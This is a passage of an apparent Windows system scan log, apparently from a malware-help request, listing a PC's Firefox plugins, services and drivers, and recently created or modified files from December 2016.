x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Nicholas\AppData\Roaming\Mozilla\Firefox\Profiles\snvw6azb.default\
FF - prefs.js: browser.startup.homepage - about:home
FF - plugin: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll
FF - plugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_91\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_91\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll
.
============= SERVICES / DRIVERS ===============
.
R0 AVGIDSHA;AVGIDSHA;C:\WINDOWS\System32\drivers\avgidsha.sys [2015-5-12 267008]
R0 Avgloga;AVG Logging Driver;C:\WINDOWS\System32\drivers\avgloga.sys [2016-2-16 360736]
R0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;C:\WINDOWS\System32\drivers\avgmfx64.sys [2016-9-26 254208]
R0 Avgrkx64;AVG Anti-Rootkit Driver;C:\WINDOWS\System32\drivers\avgrkx64.sys [2015-3-20 52992]
R0 Avguniva;AVG Universal Driver;C:\WINDOWS\System32\drivers\avguniva.sys [2016-1-8 77056]
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2016-7-16 48152]
R0 iorate;iorate;C:\WINDOWS\System32\drivers\iorate.sys [2016-11-8 48992]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2016-7-16 16224]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2016-7-16 107032]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2016-7-16 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2016-9-25 199008]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2016-10-27 227328]
R1 Avgdiska;AVG Disk Driver;C:\WINDOWS\System32\drivers\avgdiska.sys [2016-5-13 163072]
R1 AVGIDSDriver;AVGIDSDriver;C:\WINDOWS\System32\drivers\avgidsdrivera.sys [2016-10-17 312576]
R1 Avgldx64;AVG AVI Loader Driver;C:\WINDOWS\System32\drivers\avgldx64.sys [2016-10-19 267520]
R1 Avgwfpa;AVG Firewall Driver;C:\WINDOWS\System32\drivers\avgwfpa.sys [2016-8-4 313096]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2016-7-16 88576]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2016-7-16 8192]
R2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2015-9-2 77104]
R2 Asus WebStorage Windows Service;Asus WebStorage Windows Service;C:\Program Files (x86)\ASUS\WebStorage\2.0.3.226\AsusWSWinService.exe [2013-8-16 71680]
R2 AVGIDSAgent;AVGIDSAgent;C:\Program Files (x86)\AVG\Av\avgidsagenta.exe [2016-11-2 5337696]
R2 avgsvc;AVG Service;C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [2016-12-6 1146128]
R2 avgwd;AVG WatchDog;C:\Program Files (x86)\AVG\Av\avgwdsvca.exe [2016-11-2 727512]
R2 BcmBtRSupport;Bluetooth Driver Management Service;C:\WINDOWS\System32\BtwRSupportService.exe [2015-3-27 2251992]
R2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R2 CDPUserSvc_206b8d;CDPUserSvc_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 clreg;Virtual Registry for Containers;C:\WINDOWS\System32\drivers\registry.sys [2016-7-16 70144]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2016-7-16 44496]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc [2016-7-16 44496]
R2 DptfParticipantProcessorService;Intel(R) Dynamic Platform and Thermal Framework Processor Participant Service Application;C:\WINDOWS\System32\DptfParticipantProcessorService.exe [2013-12-2 115656]
R2 DptfPolicyConfigTDPService;Intel(R) Dynamic Platform and Thermal Framework Config TDP Service Application;C:\WINDOWS\System32\DptfPolicyConfigTDPService.exe [2013-12-2 118728]
R2 DptfPolicyCriticalService;Intel(R) Dynamic Platform and Thermal Framework Critical Service Application;C:\WINDOWS\System32\DptfPolicyCriticalService.exe [2013-12-2 148160]
R2 Fabs;FABS - Helping agent for MAGIX media database;C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [2012-1-23 1858048]
R2 igfxCUIService2.0.0.0;Intel(R) HD Graphics Control Panel Service;C:\WINDOWS\System32\igfxCUIService.exe [2016-5-27 374360]
R2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2013-5-11 733696]
R2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [2014-11-19 169432]
R2 LavasoftAdAwareService11;Ad-Aware Service 11;C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.14.1023.10544\AdAwareService.exe [2016-12-5 630976]
R2 OneSyncSvc_206b8d;Sync Host_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 RichVideo64;Cyberlink RichVideo64 Service(CRVS);C:\Program Files\CyberLink\Shared files\RichVideo64.exe [2014-11-19 390632]
R2 SDScannerService;Spybot-S&D 2 Scanner Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [2016-11-2 1738168]
R2 SDUpdateService;Spybot-S&D 2 Updating Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2016-11-2 4088608]
R2 SDWSCService;Spybot-S&D 2 Security Center Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [2016-11-2 235984]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2016-7-16 78336]
R2 tiledatamodelsvc;Tile Data model server;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 vToolbarUpdater40.3.6;vToolbarUpdater40.3.6;C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\40.3.6\ToolbarUpdater.exe [2016-11-14 1349704]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2016-9-29 119648]
R2 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2016-7-16 66560]
R2 WpnService;Windows Push Notifications System Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 WtuSystemSupport;WtuSystemSupport;C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [2016-11-14 980552]
R3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
R3 bcbtums;Bluetooth RAM Firmware Download USB Filter;C:\WINDOWS\System32\drivers\bcbtums.sys [2015-3-27 173312]
R3 BthLEEnum;Bluetooth Low Energy Driver;C:\WINDOWS\System32\drivers\BthLEEnum.sys [2016-9-29 249856]
R3 DptfDevDram;DptfDevDram;C:\WINDOWS\System32\drivers\DptfDevDram.sys [2013-12-2 145640]
R3 DptfDevPch;DptfDevPch;C:\WINDOWS\System32\drivers\DptfDevPch.sys [2013-12-2 116752]
R3 DptfDevProc;DptfDevProc;C:\WINDOWS\System32\drivers\DptfDevProc.sys [2013-12-2 290256]
R3 DptfManager;DptfManager;C:\WINDOWS\System32\drivers\DptfManager.sys [2013-12-2 494808]
R3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
R3 enecir;ENE CIR Receiver;C:\WINDOWS\System32\drivers\enecir.sys [2013-12-2 71168]
R3 iwdbus;IWD Bus Enumerator;C:\WINDOWS\System32\drivers\iwdbus.sys [2013-9-30 27032]
R3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2016-7-16 20480]
R3 PimIndexMaintenanceSvc_206b8d;Contact Data_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 RTL8168;Realtek 8168 NT Driver;C:\WINDOWS\System32\drivers\Rt630x64.sys [2013-12-5 830680]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
R3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2016-7-16 28512]
R3 UnistoreSvc_206b8d;User Data Storage_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 UserDataSvc_206b8d;User Data Access_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S0 Avgboota;AVG Early Launch Anti-Malware Driver;C:\WINDOWS\System32\drivers\avgboota.sys [2016-1-7 21632]
S2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService [2016-7-16 44496]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2016-7-16 18432]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2016-7-16 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2016-7-16 15360]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2016-7-16 44496]
S3 AvgAMPS;AvgAMPS;C:\Program Files (x86)\AVG\Av\avgamps.exe [2016-11-2 647864]
S3 bcmfn;bcmfn Service;C:\WINDOWS\System32\drivers\bcmfn.sys [2016-7-16 9728]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2016-7-16 9728]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2016-7-16 44496]
S3 btwampfl;btwampfl;C:\WINDOWS\System32\drivers\btwampfl.sys [2015-3-27 188160]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2016-7-16 38912]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2016-10-27 118272]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2016-7-16 346976]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2016-7-16 2104160]
S3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2016-7-16 93184]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DptfDevDisplay;DptfDevDisplay;C:\WINDOWS\System32\drivers\DptfDevDisplay.sys [2013-12-2 70752]
S3 DptfDevFan;DptfDevFan;C:\WINDOWS\System32\drivers\DptfDevFan.sys [2013-12-2 50640]
S3 DptfDevGen;DptfDevGen;C:\WINDOWS\System32\drivers\DptfDevGen.sys [2013-12-2 78504]
S3 DptfDevPower;DptfDevPower;C:\WINDOWS\System32\drivers\DptfDevPower.sys [2013-12-2 71808]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 FirebirdServerMAGIXInstance;Firebird Server - MAGIX Instance;C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [2011-4-26 2702848]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2016-7-16 44496]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2016-7-16 20480]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2016-7-16 50016]
S3 hitmanpro37;HitmanPro 3.7 Support Driver;C:\WINDOWS\System32\drivers\hitmanpro37.sys [2016-11-7 54736]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2016-7-16 33280]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2016-7-16 81408]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2016-7-16 64512]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2016-7-16 176384]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2016-7-16 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2016-7-16 113152]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2016-7-16 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2016-7-16 526176]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2016-7-16 35840]
S3 intaud_WaveExtensible;Intel WiDi Audio Device;C:\WINDOWS\System32\drivers\intelaud.sys [2013-9-30 39320]
S3 IntcDAud;Intel(R) Display Audio;C:\WINDOWS\System32\drivers\IntcDAud.sys [2015-7-16 472872]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface;C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [2013-5-11 822232]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2016-7-16 105824]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2016-7-16 101216]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2016-10-11 64352]
S3 MessagingService_206b8d;MessagingService_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2016-7-16 842584]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2016-7-16 108896]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2016-7-16 90624]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2016-7-16 58720]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2016-7-16 61792]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2016-7-16 928608]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2016-7-16 88416]
S3 scmdisk0101;Microsoft NVDIMM-N disk driver;C:\WINDOWS\System32\drivers\scmdisk0101.sys [2016-7-16 123904]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2016-9-25 1312768]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2016-7-16 151904]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2016-7-16 44496]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2016-9-29 81760]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2016-7-16 32096]
S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2016-7-16 287744]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2016-7-16 95744]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2016-7-16 108544]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2016-7-16 50688]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2016-7-16 45568]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2016-7-16 263008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2016-7-16 96608]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2016-7-16 137056]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2016-7-16 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2016-7-16 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2016-7-16 27488]
S3 USBAAPL64;Apple Mobile USB Driver;C:\WINDOWS\System32\drivers\usbaapl64.sys [2015-6-17 54784]
S3 UsoSvc;Update Orchestrator Service for Windows Update;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2016-7-16 32256]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2016-7-16 10240]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2016-9-29 719360]
S3 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2016-7-16 123232]
S3 WdNisSvc;Windows Defender Network Inspection Service;C:\Program Files\Windows Defender\NisSrv.exe [2016-7-16 347328]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;C:\WINDOWS\System32\svchost.exe -k WepHostSvcGroup [2016-7-16 44496]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2016-7-16 32096]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2016-7-16 64864]
S3 wisvc;Windows Insider Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 workfolderssvc;Work Folders;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 WpnUserService_206b8d;Windows Push Notifications User Service_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 XblAuthManager;Xbox Live Auth Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 XblGameSave;Xbox Live Game Save;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2016-12-9 258560]
S3 XboxNetApiSvc;Xbox Live Networking Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2016-9-25 43520]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S4 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
.
=============== Created Last 30 ================
.
2016-12-19 00:48:33 -------- d-----w- C:\Users\Nicholas\AppData\Roaming\Smartflix
2016-12-19 00:48:27 -------- d-----w- C:\Users\Nicholas\AppData\Local\smartflix
2016-12-19 00:48:26 -------- d-----w- C:\Users\Nicholas\AppData\Local\SquirrelTemp
2016-12-17 19:27:25 -------- d--h--w- C:\OneDriveTemp
2016-12-15 03:10:16 321480 ----a-w- C:\Program Files (x86)\Mozilla Firefox\tobedeleted\mozB629.tmp
2016-12-14 03:36:18 20364888 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerInstaller.exe
2016-12-09 22:58:59 691712 ----a-w- C:\WINDOWS\System32\lsm.dll
2016-12-08 08:16:03 -------- d-----w- C:\WINDOWS\pss
2016-12-08 08:14:25 -------- d-----w- C:\Program Files\Common Files\Lavasoft
.
==================== Find3M ====================
.
2016-12-14 17:08:15 180 ----a-w- C:\WINDOWS\System32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-12-11 23:56:25 835576 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2016-12-11 23:56:25 177656 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2016-12-09 22:43:22 180224 ----a-w- C:\WINDOWS\System32\enrollmentapi.dll
2016-12-09 10:42:15 1637728 ----a-w- C:\WINDOWS\System32\appraiser.dll
2016-12-09 10:42:14 137568 ----a-w- C:\WINDOWS\System32\acmigration.dll
2016-12-09 10:34:34 894096 ----a-w- C:\WINDOWS\System32\winresume.exe
2016-12-09 10:34:34 1051112 ----a-w- C:\WINDOWS\System32\winresume.efi
2016-12-09 10:33:26 1354320 ----a-w- C:\WINDOWS\System32\winload.efi
2016-12-09 10:33:26 1173496 ----a-w- C:\WINDOWS\System32\winload.exe
2016-12-09 10:32:11 7816032 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2016-12-09 10:30:39 377184 ----a-w- C:\WINDOWS\System32\drivers\clfs.sys
2016-12-09 10:29:23 2681200 ----a-w- C:\WINDOWS\System32\CoreUIComponents.dll
2016-12-09 10:28:24 764392 ----a-w- C:\WINDOWS\System32\CoreMessaging.dll
2016-12-09 10:27:38 172528 ----a-w- C:\WINDOWS\System32\sspicli.dll
2016-12-09 10:20:21 2677544 ----a-w- C:\WINDOWS\System32\d3d10warp.dll
2016-12-09 10:20:20 2189664 ----a-w- C:\WINDOWS\System32\drivers\dxgkrnl.sys
2016-12-09 10:20:16 658784 ----a-w- C:\WINDOWS\System32\drivers\dxgmms2.sys
2016-12-09 10:20:13 402272 ----a-w- C:\WINDOWS\System32\drivers\dxgmms1.sys
2016-12-09 10:20:12 1738560 ----a-w- C:\WINDOWS\System32\WindowsCodecs.dll
2016-12-09 10:19:35 1293152 ----a-w- C:\WINDOWS\System32\LicenseManager.dll
2016-12-09 10:19:21 168424 ----a-w- C:\WINDOWS\System32\bcrypt.dll
2016-12-09 10:18:47 624048 ----a-w- C:\WINDOWS\System32\drivers\cng.sys
2016-12-09 10:18:21 2913144 ----a-w- C:\WINDOWS\System32\combase.dll
2016-12-09 10:18:16 1100128 ----a-w- C:\WINDOWS\System32\hvix64.exe
2016-12-09 10:18:15 1267512 ----a-w- C:\WINDOWS\System32\WinTypes.dll
2016-12-09 10:18:14 811872 ----a-w- C:\WINDOWS\System32\hvloader.exe
2016-12-09 10:18:12 947552 ----a-w- C:\WINDOWS\System32\hvloader.efi
2016-12-09 10:18:09 989024 ----a-w- C:\WINDOWS\System32\hvax64.exe
2016-12-09 10:15:26 8168000 ----a-w- C:\WINDOWS\System32\Windows.Media.Protection.PlayReady.dll
2016-12-09 10:15:18 1988560 ----a-w- C:\WINDOWS\System32\mfmp4srcsnk.dll
2016-12-09 10:14:50 1274712 ----a-w- C:\WINDOWS\System32\ole32.dll
2016-12-09 10:14:33 241504 ----a-w- C:\WINDOWS\System32\CloudExperienceHost.dll
2016-12-09 10:11:15 2048496 ----a-w- C:\WINDOWS\SysWow64\CoreUIComponents.dll
2016-12-09 10:10:58 1461200 ----a-w- C:\WINDOWS\System32\user32.dll
2016-12-09 10:10:40 1572768 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2016-12-09 10:09:27 455520 ----a-w- C:\WINDOWS\System32\securekernel.exe
2016-12-09 10:01:59 2323728 ----a-w- C:\WINDOWS\SysWow64\d3d10warp.dll
2016-12-09 10:01:43 1503544 ----a-w- C:\WINDOWS\SysWow64\WindowsCodecs.dll
2016-12-09 10:01:08 861024 ----a-w- C:\WINDOWS\SysWow64\LicenseManager.dll
2016-12-09 10:00:58 106896 ----a-w- C:\WINDOWS\SysWow64\bcrypt.dll
2016-12-09 09:59:25 846560 ----a-w- C:\WINDOWS\SysWow64\WinTypes.dll
2016-12-09 09:59:24 2166752 ----a-w- C:\WINDOWS\SysWow64\combase.dll
